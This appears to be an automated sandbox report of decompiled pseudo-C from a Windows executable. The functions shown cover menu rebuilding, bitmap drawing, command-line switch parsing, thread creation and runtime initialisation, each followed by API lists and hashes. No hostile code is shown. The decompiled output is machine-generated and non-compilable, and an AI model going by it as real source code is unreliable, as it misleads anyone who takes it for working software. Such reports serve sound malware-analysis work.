                  					E0042EA62(_t181, _t220, _t222, _t227, __eflags);
                  					asm("int3");
                  					_push(0x130);
                  					E00431B04(E0044C36D, _t181, _t222, _t227);
                  					_t228 = _a4;
                  					__eflags = _t228;
                  					_t223 = _t186;
                  					__eflags = 0 | _t228 != 0x00000000;
                  					if(__eflags == 0) {
                  						E00406436(_t181, _t186, _t223, _t228, __eflags);
                  					}
                  					_t187 =  *(_t228 + 0xc);
                  					_t182 = _t223 + 0x1c;
                  					_t110 =  *_t182;
                  					__eflags =  *(_t110 - 0xc);
                  					if( *(_t110 - 0xc) == 0) {
                  						__eflags = _t187;
                  						if(_t187 != 0) {
                  							E0041F5B6(_t182, _t187,  *(_t228 + 4), _t182, 0);
                  						}
                  					}
                  					_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 8))));
                  					__eflags =  *(_t188 - 0xc);
                  					if( *(_t188 - 0xc) != 0) {
                  						__eflags =  *(_t228 + 0xc);
                  						if( *(_t228 + 0xc) != 0) {
                  							_t183 = 0;
                  							__eflags =  *(_t223 + 4);
                  							if( *(_t223 + 4) > 0) {
                  								do {
                  									DeleteMenu( *( *(_t228 + 0xc) + 4),  *(_t228 + 4) + _t183, 0);
                  									_t183 = _t183 + 1;
                  									__eflags = _t183 -  *(_t223 + 4);
                  								} while (_t183 <  *(_t223 + 4));
                  							}
                  							_t182 = 0x104;
                  							_t115 = GetCurrentDirectoryA(0x104,  &_v292);
                  							__eflags = _t115;
                  							if(_t115 != 0) {
                  								__eflags = _t115 - 0x104;
                  								if(_t115 < 0x104) {
                  									_t184 = lstrlenA( &_v292);
                  									 *((char*)(_t231 + _t184 - 0x120)) = 0x5c;
                  									_t182 = _t184 + 1;
                  									_v312 = _t182;
                  									 *((char*)(_t231 + _t182 - 0x120)) = 0;
                  									E004014C0( &_v308, _t220);
                  									_v8 = _v8 & 0x00000000;
                  									E004014C0( &_v304, _t220);
                  									_v300 = _v300 & 0x00000000;
                  									__eflags =  *(_t223 + 4);
                  									_v8 = 1;
                  									if( *(_t223 + 4) > 0) {
                  										while(1) {
                  											_t125 =  *((intOrPtr*)( *_t223 + 8))( &_v308, _v300,  &_v292, _t182, 1);
                  											__eflags = _t125;
                  											if(_t125 == 0) {
                  												goto L42;
                  											}
                  											_t185 = _v308;
                  											_v296 = E004014F0( &_v304,  *((intOrPtr*)(_t185 - 0xc)) +  *((intOrPtr*)(_t185 - 0xc)));
                  											while(1) {
                  												_t129 =  *_t185;
                  												__eflags = _t129;
                  												if(_t129 == 0) {
                  													break;
                  												}
                  												__eflags = _t129 - 0x26;
                  												if(_t129 == 0x26) {
                  													_t59 =  &_v296;
                  													 *_t59 = _v296 + 1;
                  													__eflags =  *_t59;
                  													 *_v296 = 0x26;
                  												}
                  												_t131 = E00434A02( *_t185);
                  												__eflags = _t131;
                  												if(_t131 != 0) {
                  													_v296 = _v296 + 1;
                  													 *_v296 =  *_t185;
                  													_t185 = _t185 + 1;
                  													__eflags = _t185;
                  												}
                  												_v296 = _v296 + 1;
                  												 *_v296 =  *_t185;
                  												_t185 = _t185 + 1;
                  												__eflags = _t185;
                  											}
                  											 *_v296 = 0;
                  											E0040A356( &_v304, 0xffffffff);
                  											_t139 =  *((intOrPtr*)(_t223 + 0x14)) + _v300 + 0x00000001 & 0x0000000f;
                  											_t203 = 0xa;
                  											__eflags = _t139 - _t203;
                  											if(__eflags <= 0) {
                  												if(__eflags != 0) {
                  													_push(_t139);
                  													_push("&%d ");
                  													goto L40;
                  												} else {
                  													E004048C1(_t185, _t203, _t223, _t228, E00433C67(_t220,  &_v32, _t203, "1&0 "));
                  												}
                  											} else {
                  												_push(_t139);
                  												_push("%d ");
                  												L40:
                  												swprintf( &_v32, _t203);
                  											}
                  											_t142 =  *((intOrPtr*)(_t228 + 8));
                  											_t182 =  *(_t228 + 4);
                  											_v296 = _t142;
                  											 *((intOrPtr*)(_t228 + 8)) = _t142 + 1;
                  											_t79 = _t182 + 1; // 0x2
                  											 *(_t228 + 4) = _t79;
                  											_push( &_v32);
                  											_t146 = E00406039( *(_t228 + 4),  &_v320, _t220, _t223, _t228, __eflags);
                  											_push( &_v304);
                  											_push(_t146);
                  											_push( &_v316);
                  											_v8 = 2;
                  											_t148 = E00426CA7( *(_t228 + 4), _t223, _t228, __eflags);
                  											_t234 = _t234 + 0x1c;
                  											E00426898( *(_t228 + 0xc), _v296, 0x400,  *(_t228 + 4),  *_t148);
                  											E004010B0(_v316 + 0xfffffff0, _t220);
                  											_v8 = 1;
                  											E004010B0(_v320 + 0xfffffff0, _t220);
                  											_v300 = _v300 + 1;
                  											__eflags = _v300 -  *(_t223 + 4);
                  											if(_v300 <  *(_t223 + 4)) {
                  												_t182 = _v312;
                  												continue;
                  											}
                  											goto L42;
                  										}
                  									}
                  									L42:
                  									 *((intOrPtr*)(_t228 + 8)) =  *((intOrPtr*)(_t228 + 8)) - 1;
                  									 *((intOrPtr*)(_t228 + 0x20)) = GetMenuItemCount( *( *(_t228 + 0xc) + 4));
                  									 *((intOrPtr*)(_t228 + 0x18)) = 1;
                  									E004010B0(_v304 + 0xfffffff0, _t220);
                  									__eflags = _v308 + 0xfffffff0;
                  									E004010B0(_v308 + 0xfffffff0, _t220);
                  								}
                  							}
                  						}
                  					} else {
                  						_t182 =  *_t182;
                  						__eflags =  *(_t182 - 0xc);
                  						if( *(_t182 - 0xc) != 0) {
                  							 *((intOrPtr*)( *_t228 + 0xc))(_t182);
                  						}
                  						 *((intOrPtr*)( *_t228))(0);
                  					}
                  					return E00431B87(_t182, _t223, _t228);
                  				} else {
                  					E004292D1( &_v268, _t222);
                  					_t224 = 0;
                  					if( *((intOrPtr*)(_t227 + 4)) - 1 > 0) {
                  						while(E004289FF(_t227,  *((intOrPtr*)( *((intOrPtr*)(_t227 + 8)) + _t224 * 4)),  &_v268) == 0) {
                  							_t224 = _t224 + 1;
                  							if(_t224 <  *((intOrPtr*)(_t227 + 4)) - 1) {
                  								continue;
                  							} else {
                  								L8:
                  								while(_t224 > 0) {
                  									E004057D4( *((intOrPtr*)(_t227 + 8)) + _t224 * 4,  *((intOrPtr*)(_t227 + 8)) + _t224 * 4 - 4);
                  									_t224 = _t224 - 1;
                  									__eflags = _t224;
                  								}
                  								goto L9;
                  							}
                  							goto L8;
                  						}
                  						goto L8;
                  					}
                  					L9:
                  					_t171 = E00402830(_t220, _t224,  &_v268);
                  					_pop(_t225);
                  					_pop(_t229);
                  					return E00430650(_t171, _t181, _v8 ^ _t231, _t220, _t225, _t229);
                  				}
                  			}













































                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00426EB7
                  • __EH_prolog3_GS.LIBCMT ref: 00426F46
                  • DeleteMenu.USER32(?,?,00000000,00000130,00000003,000000FF,00000000), ref: 00426FC3
                  • GetCurrentDirectoryA.KERNEL32(00000104,00000130,00000130,00000003,000000FF,00000000), ref: 00426FDC
                  • lstrlenA.KERNEL32(?), ref: 00426FF9
                  • swprintf.LIBCMT ref: 00427136
                    • Part of subcall function 004289FF: lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • _strcpy_s.LIBCMT ref: 0042711E
                  • GetMenuItemCount.USER32 ref: 004271D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menulstrlen$CountCurrentDeleteDirectoryH_prolog3_Item_strcpy_slstrcmpiswprintf
                  • String ID: %d $&%d $1&0 $\
                  • API String ID: 2973701184-2399880791
                  • Opcode ID: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction ID: b6265fcdd1575fe5806665c5d52ca27f8be5779e5917fe7b4e9aef7305b3ac5e
                  • Opcode Fuzzy Hash: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction Fuzzy Hash: 16B1D371A002259FCB20DF65DD80FEAB7B4EF08314F5041AEE55997292DB38AE94CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E004234DC(void* __ebx, void* __edi, int __esi, void* __eflags) {
                  				intOrPtr _t137;
                  				intOrPtr _t139;
                  				intOrPtr _t144;
                  				intOrPtr _t191;
                  				void* _t196;
                  
                  				_t194 = __esi;
                  				_push(0x70);
                  				E00431A9B(E0044BFF2, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t196 - 0x44)) = 0x45385c;
                  				 *(_t196 - 0x40) = 0;
                  				 *((intOrPtr*)(_t196 - 0x3c)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x38)) = 0;
                  				 *(_t196 - 4) = 0;
                  				 *((intOrPtr*)(_t196 - 0x54)) = 0x45385c;
                  				 *(_t196 - 0x50) = 0;
                  				 *((intOrPtr*)(_t196 - 0x4c)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x48)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x34)) = 0x45385c;
                  				 *(_t196 - 0x30) = 0;
                  				 *((intOrPtr*)(_t196 - 0x2c)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x28)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x18)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x1c)) = 0x4502c8;
                  				_t191 = 0x452f4c;
                  				 *((intOrPtr*)(_t196 - 0x20)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x24)) = 0x452f4c;
                  				 *(_t196 - 4) = 4;
                  				if(E0040876B(_t196 - 0x44, 0) != 0 && E0040876B(_t196 - 0x54, 0) != 0 && E0040876B(_t196 - 0x34, 0) != 0 && GetObjectA( *( *((intOrPtr*)(_t196 + 8)) + 4), 0x18, _t196 - 0x7c) != 0) {
                  					E004230B1( *((intOrPtr*)(_t196 + 0xc)));
                  					if(E004230ED( *((intOrPtr*)(_t196 + 0xc)),  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x6c) & 0x0000ffff,  *(_t196 - 0x6a) & 0x0000ffff, 0) != 0) {
                  						_t194 = 1;
                  						E00423059(0, _t196 - 0x1c, 0x452f4c, CreateBitmap(8, 8, 1, 1, 0x453a54));
                  						E004230C7(_t196 - 0x24, _t196 - 0x1c);
                  						E004230B1(_t196 - 0x1c);
                  						E004230ED(_t196 - 0x1c,  *(_t196 - 0x78),  *(_t196 - 0x74), 1, 1, 0);
                  						 *((intOrPtr*)(_t196 + 8)) = E00408791(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
                  						_t137 = E00408791(_t196 - 0x54, _t196 - 0x1c);
                  						 *((intOrPtr*)(_t196 - 0x14)) = _t137;
                  						if( *((intOrPtr*)(_t196 + 8)) != 0 && _t137 != 0) {
                  							_t139 = E004224D1(GetPixel( *(_t196 - 0x40), 0, 0), _t196 - 0x44, _t138);
                  							_t194 = BitBlt;
                  							 *((intOrPtr*)(_t196 - 0x10)) = _t139;
                  							E004224D1(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xcc0020), _t196 - 0x44, 0xffffff);
                  							E004224D1(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xee0086), _t196 - 0x44,  *((intOrPtr*)(_t196 - 0x10)));
                  							_t144 = E00408791(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
                  							 *((intOrPtr*)(_t196 + 0xc)) = _t144;
                  							_t205 = _t144;
                  							if(_t144 != 0) {
                  								 *((intOrPtr*)(_t196 + 0x14)) = E004224D1(E004225CC(_t144, _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x10))), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
                  								 *(_t196 - 0x5c) =  *(_t196 - 0x78);
                  								 *(_t196 - 0x58) =  *(_t196 - 0x74);
                  								 *((intOrPtr*)(_t196 - 0x64)) = 0;
                  								 *((intOrPtr*)(_t196 - 0x60)) = 0;
                  								E004224D1(E004225CC(E00419315(_t196 - 0x34, _t196 - 0x64, _t196 - 0x24), _t196 - 0x34, _t148), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
                  								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
                  								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x50), 0, 0, 0x8800c6);
                  								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
                  								_t191 = 0x452f4c;
                  							}
                  							E00408791(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
                  							E00408791(_t196 - 0x54,  *((intOrPtr*)(_t196 - 0x14)));
                  							E00408791(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
                  						}
                  					}
                  				}
                  				 *(_t196 - 4) = 3;
                  				 *((intOrPtr*)(_t196 - 0x24)) = _t191;
                  				E0040ADD4(0, _t196 - 0x24, _t191, _t194, _t205);
                  				 *(_t196 - 4) = 2;
                  				 *((intOrPtr*)(_t196 - 0x1c)) = 0x4502c8;
                  				E0040ADD4(0, _t196 - 0x1c, _t191, _t194, _t205);
                  				 *(_t196 - 4) = 1;
                  				E00422E06(_t196 - 0x34);
                  				 *(_t196 - 4) = 0;
                  				E00422E06(_t196 - 0x54);
                  				 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
                  				return E00431B73(E00422E06(_t196 - 0x44));
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 004234E3
                    • Part of subcall function 0040876B: CreateCompatibleDC.GDI32(?), ref: 0040877E
                  • GetObjectA.GDI32(00000004,00000018,?), ref: 0042356E
                    • Part of subcall function 004230ED: CreateBitmap.GDI32(?,?,?,?,?), ref: 00423104
                  • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,00453A54), ref: 004235B3
                    • Part of subcall function 004230C7: CreatePatternBrush.GDI32(?), ref: 004230DA
                    • Part of subcall function 004230B1: DeleteObject.GDI32(00000000), ref: 004230C0
                  • GetPixel.GDI32(?,00000000,00000000), ref: 0042361A
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224EF
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224FC
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423647
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 0042366B
                    • Part of subcall function 004225CC: SetTextColor.GDI32(?,?), ref: 004225EA
                    • Part of subcall function 004225CC: SetTextColor.GDI32(?,?), ref: 004225F7
                    • Part of subcall function 00419315: FillRect.USER32 ref: 0041932B
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 004236F5
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 0042370C
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0042371F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ColorCreate$BitmapObjectText$BrushCompatibleDeleteFillH_prolog3PatternPixelRect
                  • String ID: L/E$L/E$\8E
                  • API String ID: 3432338323-1579667955
                  • Opcode ID: dadb1abdf5835a7780b6851555df14feb24c5829929af802011495c8ec1e7c59
                  • Instruction ID: 6f4b3f876875d9ea7b1f9b928250c836160261c2eb40080eca9ba127405d88d3
                  • Opcode Fuzzy Hash: dadb1abdf5835a7780b6851555df14feb24c5829929af802011495c8ec1e7c59
                  • Instruction Fuzzy Hash: FE9103B1D0011DAEDF11EFE2DE819EEBBB9FF08348F60402AB505A2161DB395E15DB24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E00415151(void* __ecx, CHAR* _a4) {
                  				int _t14;
                  				int _t15;
                  				void* _t16;
                  				void* _t17;
                  				void* _t18;
                  				void* _t20;
                  				void* _t21;
                  				void* _t22;
                  				void* _t23;
                  				CHAR* _t24;
                  				void* _t41;
                  				void* _t43;
                  				void* _t45;
                  				void* _t47;
                  
                  				_t24 = _a4;
                  				_t47 = __ecx;
                  				_t14 = lstrcmpA(_t24, "pt");
                  				if(_t14 == 0) {
                  					 *((intOrPtr*)(_t47 + 0x14)) = 3;
                  					return _t14;
                  				}
                  				_t15 = lstrcmpA(_t24, "p");
                  				if(_t15 == 0) {
                  					 *((intOrPtr*)(_t47 + 0x14)) = 2;
                  					return _t15;
                  				}
                  				_t16 = E0040D6F3(_t24, "Register");
                  				if(_t16 == 0) {
                  					L22:
                  					 *((intOrPtr*)(_t47 + 0x14)) = 5;
                  					return _t16;
                  				}
                  				_t16 = E0040D6F3(_t24, "Regserver");
                  				if(_t16 == 0) {
                  					goto L22;
                  				}
                  				_t16 = E0040D6F3(_t24, "RegisterPerUser");
                  				if(_t16 == 0) {
                  					L21:
                  					 *((intOrPtr*)(_t47 + 0x10)) = 1;
                  					goto L22;
                  				}
                  				_t16 = E0040D6F3(_t24, "RegserverPerUser");
                  				if(_t16 == 0) {
                  					goto L21;
                  				}
                  				_t17 = E0040D6F3(_t24, "Unregister");
                  				if(_t17 == 0) {
                  					L20:
                  					 *((intOrPtr*)(_t47 + 0x14)) = 6;
                  					return _t17;
                  				}
                  				_t17 = E0040D6F3(_t24, "Unregserver");
                  				if(_t17 == 0) {
                  					goto L20;
                  				}
                  				_t18 = E0040D6F3(_t24, "UnregisterPerUser");
                  				if(_t18 == 0) {
                  					L19:
                  					 *((intOrPtr*)(_t47 + 0x14)) = 6;
                  					 *((intOrPtr*)(_t47 + 0x10)) = 1;
                  					return _t18;
                  				}
                  				_t18 = E0040D6F3(_t24, "UnregserverPerUser");
                  				_pop(_t41);
                  				if(_t18 == 0) {
                  					goto L19;
                  				}
                  				if(lstrcmpA(_t24, "dde") == 0) {
                  					_t23 = E00423E10(_t41, _t19);
                  					 *((intOrPtr*)(_t47 + 0x14)) = 4;
                  					return _t23;
                  				}
                  				_t20 = E0040D6F3(_t24, "Embedding");
                  				_pop(_t43);
                  				if(_t20 == 0) {
                  					_t22 = E00423E10(_t43, _t20);
                  					 *((intOrPtr*)(_t47 + 8)) = 1;
                  					L16:
                  					 *(_t47 + 4) =  *(_t47 + 4) & 0x00000000;
                  					return _t22;
                  				}
                  				_t21 = E0040D6F3(_t24, "Automation");
                  				_pop(_t45);
                  				if(_t21 == 0) {
                  					_t22 = E00423E10(_t45, _t21);
                  					 *((intOrPtr*)(_t47 + 0xc)) = 1;
                  					goto L16;
                  				}
                  				return _t21;
                  			}


















                  APIs
                  • lstrcmpA.KERNEL32(?,00451CF8), ref: 0041516A
                  • lstrcmpA.KERNEL32(?,00451CF4), ref: 00415182
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp
                  • String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde
                  • API String ID: 1534048567-3876351261
                  • Opcode ID: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction ID: bacbe481972acab002e41af3f2ad9a35167e3d19faef8bf490c2dd1adb14a177
                  • Opcode Fuzzy Hash: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction Fuzzy Hash: C231C373544F02A5E2246E76ED02BD722DC6B5176AF20081FF806A66C3DFFED588496C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00416443(intOrPtr __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                  				signed int _v8;
                  				void* _v12;
                  				void* _v16;
                  				signed int _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t43;
                  				void* _t59;
                  				void* _t60;
                  				intOrPtr _t64;
                  
                  				_t59 = __edx;
                  				_t64 = __ecx;
                  				_t69 =  *((intOrPtr*)(__ecx + 0x2c));
                  				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
                  					E00406436(0, __ecx, _t60, __ecx, _t69);
                  				}
                  				E00431160(_t60,  &_v32, 0, 0x1c);
                  				_v32 = E0041EDAB(0, _t60, _t64, _t69);
                  				_v28 = _t64;
                  				_v16 = CreateEventA(0, 1, 0, 0);
                  				_v12 = CreateEventA(0, 1, 0, 0);
                  				_t37 = _a4;
                  				_v24 = _a4;
                  				if(_v16 == 0) {
                  					L12:
                  					__eflags = _v12;
                  					if(_v12 == 0) {
                  						goto L14;
                  					}
                  					goto L13;
                  				} else {
                  					if(_v12 == 0) {
                  						CloseHandle(_v16);
                  						goto L12;
                  					}
                  					_t43 = E00433E25(_t59, _t64, _a12, _a8, E00416327,  &_v32, _t37 | 0x00000004, _t64 + 0x30);
                  					 *(_t64 + 0x2c) = _t43;
                  					if(_t43 != 0) {
                  						ResumeThread(_t43);
                  						WaitForSingleObject(_v16, 0xffffffff);
                  						CloseHandle(_v16);
                  						__eflags = _a4 & 0x00000004;
                  						if((_a4 & 0x00000004) != 0) {
                  							SuspendThread( *(_t64 + 0x2c));
                  						}
                  						__eflags = _v8;
                  						if(_v8 == 0) {
                  							SetEvent(_v12);
                  							return 1;
                  						} else {
                  							WaitForSingleObject( *(_t64 + 0x2c), 0xffffffff);
                  							CloseHandle( *(_t64 + 0x2c));
                  							 *(_t64 + 0x2c) = 0;
                  							L13:
                  							CloseHandle(_v12);
                  							L14:
                  							return 0;
                  						}
                  					}
                  					CloseHandle(_v16);
                  					CloseHandle(_v12);
                  					goto L14;
                  				}
                  			}


















                  APIs
                  • _memset.LIBCMT ref: 00416463
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00416481
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041648B
                  • CloseHandle.KERNEL32(?), ref: 004164D9
                  • CloseHandle.KERNEL32(?), ref: 004164DE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ResumeThread.KERNEL32(00000000), ref: 004164E3
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004164EE
                  • CloseHandle.KERNEL32(?), ref: 004164FD
                  • SuspendThread.KERNEL32(?), ref: 00416508
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00416518
                  • CloseHandle.KERNEL32(?), ref: 00416521
                  • SetEvent.KERNEL32(00000004), ref: 0041652B
                  • CloseHandle.KERNEL32(?), ref: 00416543
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseHandle$Event$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                  • String ID:
                  • API String ID: 2577798173-0
                  • Opcode ID: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction ID: 0ba4b3701773fc9ac83d28f7e8eab003c92724f4a67e4e5f2fa9819084e5fd14
                  • Opcode Fuzzy Hash: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction Fuzzy Hash: 24316E72C00209BFDB11AFA5DC848AEBBBAFF48354F11857AF911A2160D7359A819F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E00436018(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t23;
                  				intOrPtr _t28;
                  				intOrPtr _t32;
                  				intOrPtr _t45;
                  				void* _t46;
                  
                  				_t35 = __ebx;
                  				_push(0xc);
                  				_push(0x45e180);
                  				E00431818(__ebx, __edi, __esi);
                  				_t44 = L"KERNEL32.DLL";
                  				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                  				if(_t23 == 0) {
                  					_t23 = E0043392F(_t44);
                  				}
                  				 *(_t46 - 0x1c) = _t23;
                  				_t45 =  *((intOrPtr*)(_t46 + 8));
                  				 *((intOrPtr*)(_t45 + 0x5c)) = 0x456080;
                  				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                  				if(_t23 != 0) {
                  					_t35 = GetProcAddress;
                  					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                  					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                  				}
                  				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                  				 *((char*)(_t45 + 0xc8)) = 0x43;
                  				 *((char*)(_t45 + 0x14b)) = 0x43;
                  				 *(_t45 + 0x68) = 0x463620;
                  				E0043A0BF(_t35, 0xd);
                  				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                  				InterlockedIncrement( *(_t45 + 0x68));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				E004360ED();
                  				E0043A0BF(_t35, 0xc);
                  				 *(_t46 - 4) = 1;
                  				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                  				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                  				if(_t28 == 0) {
                  					_t32 =  *0x463c28; // 0x24310f8
                  					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                  				}
                  				E00439086( *((intOrPtr*)(_t45 + 0x6c)));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				return E0043185D(E004360F6());
                  			}









                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0045E180,0000000C,00436153,00000000,00000000,?,?,38A11573), ref: 0043602A
                  • __crt_waiting_on_module_handle.LIBCMT ref: 00436035
                    • Part of subcall function 0043392F: Sleep.KERNEL32(000003E8,00000000,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,38A11573), ref: 0043393B
                    • Part of subcall function 0043392F: GetModuleHandleW.KERNEL32(?,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,38A11573), ref: 00433944
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0043605E
                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0043606E
                  • __lock.LIBCMT ref: 00436090
                  • InterlockedIncrement.KERNEL32(00463620), ref: 0043609D
                  • __lock.LIBCMT ref: 004360B1
                  • ___addlocaleref.LIBCMT ref: 004360CF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: 6F$DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-1974163033
                  • Opcode ID: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
                  • Instruction ID: e4dbea44d3e701bfa2a05fd5f39e00ef826fe1f2e1bb3cd6cc1662b80f67c0e6
                  • Opcode Fuzzy Hash: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
